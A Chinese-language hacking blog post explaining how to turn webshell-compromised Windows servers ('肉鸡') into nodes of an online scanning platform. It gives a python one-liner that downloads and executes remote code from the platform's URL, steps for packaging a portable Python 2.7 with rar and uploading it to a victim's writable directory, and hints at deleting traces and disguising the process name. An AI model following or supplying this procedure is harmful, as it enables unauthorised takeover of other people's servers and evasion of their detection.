不知道大家都用不用www.yas*****.com,旧版是www.bug****.net。挂载各种插件,不过扫描要添加在线引擎节点。
你也可以自己电脑执行python -c "exec(__import__('urllib').urlopen('http://www.yasc****r.com/xxxxxyyyyyzzzzzz').read())" 来上线。
我这里要说的是,各位手里闲着的webshell也不少吧,何不把它们派上场?当然有人要问了,你以为每台肉鸡都有Python了? 哈哈
好吧。这个问题我也困扰了半天,一度以为要来个自安装版或者什么t00ls专版by iframe呢。写了半天autoit了,才想起绿色版。
1.选个Python2.7.*的版本下载到本机执行安装,第一步选择Install just for me (not available on Windows Vista) (该步尤为重要!)
2.把一些帮助文档打钩去掉,能省就省。一顿next> finish。
3.把Python2.7文件夹打包,我这里选用winrar,因为体积很大,分卷压缩。
rar a -m0 -v2m d:\py.rar c:\python2.7\*
4.选一个可写的角落,上传所有压缩包和winrar目录下的386K的rar.exe。
5.C:\temp\rar.exe x C:\temp\py.part01.rar c:\temp\
OK解压完了 开工。。。
等等,什么删除文件,更换一个有诱惑力的进程名,我这里就不多说了,当然肉鸡有python就更完美了。
webshell下让肉鸡执行
c:\temp\python.exe -c "exec(__import__('urllib').urlopen('http://www.yascanner.com/xxxxxyyyyyzzzzzz').read())"
IIS APPPOOL进程该起什么进程名,大家自己琢磨吧。
进程所属名问题,欢迎大家建议
听说上一篇文章作者抓鸡分分钟破百,不在话下,啧啧,这上线,这速度。
本文技术无任何含量,请勿拍砖。
发表评论